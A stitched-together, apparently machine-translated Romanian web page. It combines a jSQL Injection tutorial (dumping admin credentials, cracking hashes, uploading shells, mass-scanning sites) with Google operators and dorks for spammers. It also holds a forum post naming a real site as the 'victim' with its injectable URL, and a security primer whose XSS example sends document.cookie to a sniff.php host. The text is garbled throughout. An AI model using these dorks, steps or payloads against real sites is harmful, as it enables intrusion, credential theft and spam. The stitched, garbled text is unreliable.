Instrucțiuni pentru utilizarea jSQL Injection, un instrument multifuncțional pentru căutarea și exploatarea injecțiilor SQL în Kali Linux. Instrucțiuni pentru utilizarea jSQL Injection - un instrument multifuncțional pentru căutarea și exploatarea injecțiilor SQL în Kali Linux

Acasă / Îngheață

Rulați fișierul descărcat făcând dublu clic (trebuie să aveți mașină virtuală ).

3. Anonimitatea la verificarea unui site pentru injectare SQL
Configurarea Torși Privoxy în Kali Linux

[Secțiune în curs de dezvoltare]

Configurarea Tor și Privoxy pe Windows

[Secțiune în curs de dezvoltare]

Setări proxy în Injecție jSQL

[Secțiune în curs de dezvoltare]

4. Verificarea site-ului pentru injectare SQL cu jSQL Injection

Lucrul cu programul este extrem de simplu. Doar introduceți adresa site-ului web și apăsați ENTER.

Următoarea captură de ecran arată că site-ul este vulnerabil la trei tipuri de injecții SQL (informațiile despre acestea sunt indicate în colțul din dreapta jos). Făcând clic pe numele injecțiilor, puteți schimba metoda utilizată:

De asemenea, bazele de date existente ne-au fost deja afișate.

Puteți vizualiza conținutul fiecărui tabel:

De obicei, cel mai interesant lucru despre tabele sunt acreditările de administrator.

Dacă aveți noroc și găsiți datele administratorului, atunci este prea devreme să vă bucurați. Încă trebuie să găsiți panoul de administrare unde să introduceți aceste date.

5. Căutați panouri de administrare cu jSQL Injection

Pentru a face acest lucru, mergeți la următoarea filă. Aici suntem întâmpinați cu o listă de adrese posibile. Puteți selecta una sau mai multe pagini pentru a verifica:

Comoditatea constă în faptul că nu trebuie să utilizați alte programe.

Din păcate, nu există foarte mulți programatori neglijenți care stochează parolele în text clar. Destul de des în linia parolei vedem ceva de genul

8743b52063cd84097a65d1633f5c74f5

Acesta este un hash. Îl puteți decripta folosind forța brută. Și... jSQL Injection are un brute forcer încorporat.

6. Hash-uri de forță brută folosind jSQL Injection

Comoditatea incontestabilă este că nu trebuie să cauți alte programe. Există suport pentru multe dintre cele mai populare hashe-uri.

Acesta nu este cel mai mult cea mai buna varianta. Pentru a deveni un guru în decodarea hashurilor, este recomandată Cartea „” în rusă.

Dar, desigur, când nu există un alt program la îndemână sau nu există timp de studiat, jSQL Injection cu funcția de forță brută încorporată va fi foarte utilă.

Există setări: puteți seta ce caractere sunt incluse în parolă, intervalul de lungime a parolei.

7. Operațiuni cu fișiere după detectarea injecțiilor SQL

Pe lângă operațiunile cu baze de date - citirea și modificarea acestora, dacă sunt detectate injecții SQL, pot fi efectuate următoarele operațiuni cu fișiere:

  • citirea fișierelor de pe server
  • încărcarea fișierelor noi pe server
  • încărcarea shell-urilor pe server

Și toate acestea sunt implementate în jSQL Injection!

Există restricții - serverul SQL trebuie să aibă privilegii de fișier. Cele sensibile administratorii de sistem sunt cu dizabilități și au acces la sistem de fișiere nu o va putea obține.

Prezența privilegiilor de fișier este destul de simplu de verificat. Accesați una dintre file (citirea fișierelor, crearea unui shell, încărcarea unui fișier nou) și încercați să efectuați una dintre operațiunile specificate.

Încă foarte nota importanta- trebuie să știm calea absolută exactă către fișierul cu care vom lucra - altfel nu va funcționa nimic.

Uită-te la următoarea captură de ecran:

La orice încercare de a opera asupra unui fișier, ni se răspunde: No FILE privilege (fără privilegii de fișier). Și nu se poate face nimic aici.

Dacă în schimb aveți o altă eroare:

Problemă la scrierea în [nume_director]

Aceasta înseamnă că ați specificat incorect calea absolută în care doriți să scrieți fișierul.

Pentru a ghici o cale absolută, trebuie măcar să știi sistem de operare pe care rulează serverul. Pentru a face acest lucru, treceți la fila Rețea.

Această intrare (linia Win64) ne oferă motive să presupunem că avem de-a face cu sistemul de operare Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Conexiune: Keep-Alive Metoda: HTTP/1.1 200 OK Lungime conținut: 353 Data: Vineri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Tip de conținut: text/html; set de caractere=UTF-8

Aici avem câteva Unix (*BSD, Linux):

Codificare transfer: fragmentat Data: vineri, 11 decembrie 2015 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Conexiune: keep-alive Tip de conținut: text/html X- Produs de: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

Și aici avem CentOS:

Metodă: HTTP/1.1 200 OK Expiră: Joi, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Conexiune: keep-alive X-Cache-Lookup: MISS de la t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS de la t1.hoster.ru Cache-Control: fără stocare, fără cache, revalidare obligatorie, post-verificare=0, pre-verificare=0 Pragma: fără cache Data: vineri, 11 decembrie 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; set de caractere=WINDOWS-1251

Pe Windows, un folder tipic pentru site-uri este C:\Server\data\htdocs\ . Dar, de fapt, dacă cineva „s-a gândit” să facă un server pe Windows, atunci, foarte probabil, această persoană nu a auzit nimic despre privilegii. Prin urmare, ar trebui să începeți să încercați direct din directorul C:/Windows/:

După cum puteți vedea, totul a mers bine prima dată.

Dar shell-urile jSQL Injection în sine ridică îndoieli în mintea mea. Dacă aveți privilegii de fișier, atunci puteți încărca cu ușurință ceva cu o interfață web.

8. Verificarea în bloc a site-urilor pentru injecții SQL

Și chiar și această funcție este disponibilă în jSQL Injection. Totul este extrem de simplu - descărcați o listă de site-uri (le puteți importa dintr-un fișier), selectați-le pe cele pe care doriți să le verificați și faceți clic pe butonul corespunzător pentru a începe operația.

Concluzie din jSQL Injection

Injecția jSQL este bună, instrument puternic pentru a căuta și, ulterior, a utiliza injecții SQL găsite pe site-uri web. Avantajele sale neîndoielnice: ușurință în utilizare, încorporat funcții aferente. jSQL Injection poate fi cel mai bun prieten al începătorilor atunci când analizează site-uri web.

Printre neajunsuri, as remarca imposibilitatea editării bazelor de date (cel puțin nu am găsit această funcționalitate). Ca toate instrumentele cu interfata grafica, unul dintre dezavantajele acestui program poate fi atribuit incapacității de a-l folosi în scripturi. Cu toate acestea, este posibilă și o anumită automatizare în acest program - datorită funcției încorporate de scanare în masă a site-ului.

Programul jSQL Injection este mult mai convenabil de utilizat decât sqlmap. Dar sqlmap acceptă mai multe tipuri de injecții SQL, are opțiuni de lucru cu firewall-uri de fișiere și alte funcții.

Concluzie: jSQL Injection - cel mai bun prieten hacker începător.

Ajutorul pentru acest program din Enciclopedia Kali Linux poate fi găsit pe această pagină: http://kali.tools/?p=706

Cum să cauți corect folosind google.com

Probabil că toată lumea știe cum să folosească asta motor de căutare, ca Google =) Dar nu toată lumea știe asta dacă o compui corect interogare de căutare cu ajutorul modelelor speciale, poți obține rezultatele a ceea ce cauți mult mai eficient și mai rapid =) În acest articol voi încerca să arăt ce și cum trebuie să faci pentru a căuta corect

Google acceptă mai mulți operatori de căutare avansate care au o semnificație specială atunci când caută pe google.com. De obicei, acești operatori schimbă căutarea sau chiar îi spun Google să o facă complet diverse tipuri căutare. De exemplu, link: construct este un operator special, iar cererea link:www.google.com nu vă va oferi o căutare normală, ci va găsi în schimb toate paginile web care au link-uri către google.com.
tipuri alternative de solicitare

cache: dacă includeți alte cuvinte într-o interogare, Google va evidenția acele cuvinte incluse în documentul stocat în cache.
De exemplu, cache:www.site-ul web va afișa conținutul din cache cu cuvântul „web” evidențiat.

link: interogarea de căutare de mai sus va afișa pagini web care conțin linkuri către interogarea specificată.
De exemplu: link: www.site va afișa toate paginile care au un link către http://www.site

legate: afișează pagini web care sunt „legate” de pagina web specificată.
De exemplu, legate de: www.google.com va lista pagini web care sunt similare pagina de start Google.

info: Solicitați informații: va prezenta câteva informații pe care Google le are despre pagina web pe care o solicitați.
De exemplu, info:site-ul web va afișa informații despre forumul nostru =) (Armada - Forumul pentru webmasteri adulți).

Alte solicitări de informații

define: Interogarea define: va oferi o definiție a cuvintelor pe care le introduceți după ea, colectată din diverse surse online. Definiția va fi pentru întreaga frază introdusă (adică va include toate cuvintele din interogarea exactă).

stocuri: dacă începeți o interogare cu acțiuni: Google va procesa restul termenilor de interogare ca simboluri bursiere și va trimite către o pagină care afișează informații gata făcute pentru aceste simboluri.
De exemplu, stocuri: Intel yahoo va afișa informații despre Intel și Yahoo. (Rețineți că ar trebui să introduceți simboluri de știri de ultimă oră, nu numele companiei)

Modificatori de interogare

site: dacă includeți site: în interogarea dvs., Google va limita rezultatele la acele site-uri web pe care le găsește în domeniul respectiv.
De asemenea, puteți căuta după zone individuale, cum ar fi ru, org, com etc ( site:com site:ru)

allintitle: dacă executați o interogare cu allintitle:, Google va limita rezultatele la toate cuvintele de interogare din titlu.
De exemplu, allintitle: căutare pe google va returna toate paginile Google prin căutare, cum ar fi imagini, blog etc

intitle: dacă includeți intitle: în interogarea dvs., Google va limita rezultatele la documentele care conțin acel cuvânt în titlu.
De exemplu, intitle:Afaceri

allinurl: Dacă executați o interogare cu allinurl: Google va limita rezultatele la toate cuvintele de interogare din adresa URL.
De exemplu, allinurl: căutare pe google va returna documentele cu google si va cauta in titlu. De asemenea, ca opțiune, puteți separa cuvintele cu o bară oblică (/), apoi cuvintele de pe ambele părți ale barei oblice vor fi căutate în aceeași pagină: Exemplu allinurl: foo/bar

inurl: dacă includeți inurl: în interogarea dvs., Google va limita rezultatele la documentele care conțin acel cuvânt în adresa URL.
De exemplu, Animație inurl:site

intext: caută numai cuvântul specificat în textul paginii, ignorând titlul și textele link-ului și alte lucruri care nu au legătură cu. Există, de asemenea, un derivat al acestui modificator - allintext: i.e. în plus, toate cuvintele din interogare vor fi căutate numai în text, ceea ce poate fi de asemenea important, ignorând cuvintele utilizate frecvent în linkuri
De exemplu, intext:forum

interval de date: căutări într-un interval de timp (interval de date: 2452389-2452389), datele pentru ore sunt în format Julian.

Ei bine, și tot felul de exemple interesante de interogări

Exemple de scriere de interogări pentru Google. Pentru spammeri

Inurl:control.guest?a=sign

Site:books.dreambook.com „Adresa URL a paginii de pornire” „Semnați-mi” inurl:semn

Site:www.freegb.net Pagina principală

Inurl:sign.asp „Numărul de caractere”

„Message:” inurl:sign.cfm „Expeditor:”

Inurl:register.php „Înregistrarea utilizatorului” „Site web”

Inurl:edu/carte de oaspeți „Semnați cartea de oaspeți”

Inurl:post „Postează comentariu” „URL”

Inurl:/archives/ „Comentarii:” „Îți amintești informațiile?”

„Script și carte de oaspeți create de:” „URL:” „Comentarii:”

Inurl:?action=add „phpBook” „URL”

Titlu: „Trimiteți o poveste nouă”

Reviste

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatestjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Cartea de oaspeti"

Bloguri

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ „Postați un comentariu” „Îți amintești informațiile personale?”

Inurl:greatestjournal.com/community/ „Postează comentariu” „adrese ale afișelor anonimi”

„Postează comentariu” „adrese ale afișelor anonime” -

Titlu: „Postează comentariu”

Inurl:pirillo.com „Postează comentariu”

Forumuri

Inurl:gate.html?"name=Forums" "mode=reply"

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?”

Și așa, acum vă voi spune cum să piratați ceva fără cunoștințe speciale. Voi spune imediat că există puține beneficii din asta, dar totuși.
În primul rând, trebuie să găsiți site-urile în sine. Pentru a face acest lucru, accesați google.com și căutați dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Întrebări-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:canal_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

iată o mică listă. Îl poți folosi pe al tău. Și așa, am găsit site-ul. De exemplu http://www.vestitambov.ru/
Apoi, descărcați acest program

**Conținut ascuns: pentru a vedea acest conținut ascuns, numărul de postări trebuie să fie de 3 sau mai mult.**

Faceți clic pe OK. Apoi introducem site-ul victimei.
Apăsăm start. În continuare așteptăm rezultatele.
Și astfel, programul a găsit o vulnerabilitate SQL.

Apoi, descărcați Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= lipiți linkul primit acolo. Nu vă voi explica cum să utilizați Havij și de unde să-l descărcați, nu este greu de găsit. Toate. Ați primit datele de care aveți nevoie - parola de administrator, iar apoi depinde de imaginația dvs.

P.S. Aceasta este prima mea încercare de a scrie ceva. Scuze dacă ceva nu este în regulă

Am decis să vorbesc puțin despre securitatea informatiei. Articolul va fi util pentru programatorii începători și pentru cei care tocmai au început să se implice în dezvoltarea Frontend. Care este problema?

Mulți dezvoltatori începători sunt atât de distrași de scrierea codului încât uită complet de securitatea muncii lor. Și, cel mai important, ei uită de vulnerabilități precum interogările SQL și XXS. De asemenea, vin cu parole ușoare pentru panourile lor administrative și sunt supuși forței brute. Care sunt aceste atacuri și cum le poți evita?

injecție SQL

Injecția SQL este cel mai comun tip de atac asupra unei baze de date, care este efectuat în timpul unei interogări SQL pentru un anumit DBMS. Mulți oameni și chiar companii mari suferă de astfel de atacuri. Motivul este o eroare a dezvoltatorului la scrierea bazei de date și, strict vorbind, a interogărilor SQL.

Un atac de injectare SQL este posibil din cauza procesării incorecte a datelor de intrare utilizate în interogările SQL. Dacă atacul unui hacker are succes, riscați să pierdeți nu numai conținutul bazelor de date, ci și parolele și jurnalele panoului administrativ. Și aceste date vor fi destul de suficiente pentru a prelua complet site-ul sau pentru a-i face ajustări ireversibile.

Atacul poate fi reprodus cu succes în scripturi scrise în PHP, ASP, Perl și alte limbi. Succesul unor astfel de atacuri depinde mai mult de ce DBMS este utilizat și de modul în care este implementat scriptul în sine. Există multe site-uri vulnerabile pentru injecții SQL în lume. Acest lucru este ușor de verificat. Doar introduceți „dorks” - acestea sunt interogări speciale pentru căutarea site-urilor vulnerabile. Iată câteva dintre ele:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Cum să le folosești? Introduceți-le într-un motor de căutare Google sau Yandex. Motorul de căutare vă va oferi nu doar un site vulnerabil, ci și o pagină despre această vulnerabilitate. Dar nu ne vom opri aici și ne vom asigura că pagina este cu adevărat vulnerabilă. Pentru a face acest lucru, este suficient să puneți după valoarea „id=1” ghilimele unice"'". Ceva de genul asta:

  • inurl:games.php?id=1’

Și site-ul ne va da o eroare despre interogare SQL. De ce mai are nevoie hackerul nostru?

Și apoi are nevoie de acest link către pagina de eroare. Apoi, lucrul asupra vulnerabilității are loc în majoritatea cazurilor în distribuția „Kali linux” cu utilitățile sale pentru această parte: introducerea codului de injecție și efectuarea operațiunilor necesare. Cum se va întâmpla asta, nu vă pot spune. Dar puteți găsi informații despre acest lucru pe Internet.

Atacul XSS

Acest tip de atac este efectuat pe Cookie-uri. Utilizatorilor, la rândul lor, le place să le salveze. De ce nu? Ce ne-am face fără ei? La urma urmei, datorită Cookie-urilor, nu trebuie să introducem parola pentru Vk.com sau Mail.ru de o sută de ori. Și puțini sunt cei care le refuză. Dar pe internet apare adesea o regulă pentru hackeri: coeficientul de comoditate este direct proporțional cu coeficientul de insecuritate.

Pentru a implementa un atac XSS, hackerul nostru are nevoie de cunoștințe de JavaScript. La prima vedere, limbajul este foarte simplu și inofensiv, deoarece nu are acces la resursele computerului. Un hacker poate lucra doar cu JavaScript într-un browser, dar este suficient. La urma urmei, principalul lucru este să introduceți codul în pagina web.

Nu voi vorbi în detaliu despre procesul de atac. Vă voi spune doar elementele de bază și semnificația modului în care se întâmplă acest lucru.

Un hacker poate adăuga cod JS la un forum sau carte de oaspeți:

document.location.href =”http://192.168.1.7/sniff.php?test”

Scripturile ne vor redirecționa către pagina infectată, unde va fi executat codul: fie că este un sniffer, un fel de stocare sau un exploit, care ne va fura cumva Cookie-urile din cache.

De ce JavaScript? Deoarece JavaScript este excelent în gestionarea solicitărilor web și are acces la Cookie-uri. Dar dacă scriptul nostru ne duce pe un site, utilizatorul îl va observa cu ușurință. Aici hackerul folosește o opțiune mai vicleană - pur și simplu introduce codul în imagine.

Img=new Image();

Img.src="http://192.168.1.7/sniff.php?"+document.cookie;

Pur și simplu creăm o imagine și îi atribuim scriptul ca adresă.

Cum să te protejezi de toate acestea? Este foarte simplu - nu faceți clic pe linkuri suspecte.

Atacurile DoS și DDos

DoS (din limba engleză Denial of Service - refuzul serviciului) - atac de hacker pe sistem informatic pentru a o conduce la eşec. Aceasta este crearea condițiilor în care utilizatorii de bună credință ai sistemului nu pot accesa cele furnizate resurse de sistem(servere), sau acest acces este dificil. O defecțiune a sistemului poate fi, de asemenea, un pas către preluarea acestuia, dacă într-o situație de urgență software-ul produce orice informație critică: de exemplu, versiunea, partea codul programului etc. Dar cel mai adesea aceasta este o măsură a presiunii economice: pierderea unui serviciu simplu care generează venituri. Facturile de la furnizor sau măsurile de evitare a unui atac au lovit în mod semnificativ „ținta” din buzunar. În prezent, atacurile DoS și DDoS sunt cele mai populare, deoarece permit aproape oricărui sistem să eșueze fără a lăsa dovezi semnificative din punct de vedere legal.

Care este diferența dintre atacul DoS și DDos?

DoS este un atac conceput într-un mod inteligent. De exemplu, dacă serverul nu verifică corectitudinea pachetelor primite, atunci un hacker poate face o solicitare care va dura o veșnicie pentru a procesa și nu va fi suficient timp de procesor pentru a lucra cu alte conexiuni. În consecință, clienților li se va refuza serviciul. Dar nu va fi posibil să supraîncărcați sau să dezactivați site-uri mari cunoscute în acest fel. Sunt înarmați cu canale destul de largi și servere super-puternice care pot face față unei astfel de supraîncărcări fără probleme.

DDoS este de fapt același atac ca și DoS. Dar dacă în DoS există un pachet de solicitare, atunci în DDoS pot exista sute sau mai multe dintre ele. Chiar și serverele super-puternice ar putea să nu poată face față unei astfel de supraîncărcări. Să vă dau un exemplu.

Un atac DoS este atunci când ai o conversație cu cineva, dar apoi apare o persoană prostească și începe să strige tare. Este fie imposibil, fie foarte greu să vorbești. Soluție: sună la pază, care se va liniști și va scoate persoana din incintă. Atacurile DDoS sunt atunci când o mulțime de mii de astfel de oameni prost maniere intră în grabă. În acest caz, securitatea nu va putea să-i lege pe toți și să-i ia.

DoS și DDoS sunt efectuate de pe computere, așa-numiții zombi. Acestea sunt computere ale utilizatorilor piratați de hackeri care nici măcar nu bănuiesc că mașina lor participă la un atac asupra vreunui server.

Cum să te protejezi de asta? În general, în niciun caz. Dar poți face lucrurile mai dificile pentru un hacker. Pentru a face acest lucru, trebuie să selectați gazduire buna cu servere puternice.

Atacul cu forță brută

Un dezvoltator poate veni cu o mulțime de sisteme de protecție împotriva atacurilor, poate revizui complet scripturile pe care le-am scris, poate verifica site-ul pentru vulnerabilități etc. Dar când vine vorba de ultimul pas aspectul site-ului, și anume atunci când pur și simplu pune o parolă pe panoul de administrare, poate uita de un lucru. Parolă!

Nu este strict recomandat să setați o parolă simplă. Acesta ar putea fi 12345, 1114457, vasya111 etc. Nu este recomandat să setați parole mai mici de 10-11 caractere. În caz contrar, este posibil să fii supus celui mai comun și mai simplu atac - Forța brută.

Forța brută este un atac cu parolă de dicționar folosind programe speciale. Dicționarele pot fi diferite: latină, enumerare după numere, să zicem până la un anumit interval, mixte (latina + numere), și există chiar și dicționare cu caractere unice @#4$%&*~~`’”\ ? etc.

Desigur, acest tip de atac este ușor de evitat. Tot ce trebuie să faceți este să găsiți o parolă complexă. Chiar și un captcha te poate salva. De asemenea, dacă site-ul tău este realizat pe un CMS, atunci mulți dintre ei detectează acest tip de atac și blochează IP-ul. Trebuie să vă amintiți întotdeauna că, cu cât sunt mai multe caractere diferite dintr-o parolă, cu atât este mai greu de ghicit.

Cum funcționează hackerii? În cele mai multe cazuri, fie suspectează, fie cunosc o parte din parolă în avans. Este destul de logic să presupunem că parola utilizatorului nu va consta cu siguranță din 3 sau 5 caractere. Astfel de parole duc la hacking frecvent. Practic, hackerii iau un interval de la 5 până la 10 caractere și adaugă mai multe caractere pe care ar putea să le cunoască în avans. În continuare, parolele cu intervalele necesare sunt generate. Distribuția Kali Linux are chiar și programe pentru astfel de cazuri. Și voilà, atacul nu va mai dura mult, deoarece volumul dicționarului nu mai este atât de mare. În plus, un hacker poate folosi puterea plăcii video. Unele dintre ele acceptă sistemul CUDA, iar viteza de căutare crește de până la 10 ori. Și acum vedem că atacul este așa într-un mod simplu destul de real. Dar nu doar site-urile web sunt supuse forței brute.

Dragi dezvoltatori, nu uitați niciodată de sistemul de securitate a informațiilor, deoarece astăzi mulți oameni, inclusiv state, suferă de astfel de tipuri de atacuri. La urma urmei, cea mai mare vulnerabilitate este o persoană care poate oricând să fie distrasă undeva sau să rateze ceva. Suntem programatori, dar nu mașini programate. Fii mereu în gardă, pentru că pierderea informațiilor poate avea consecințe grave!

© 2024 ermake.ru -- Despre repararea PC-ului - Portal de informații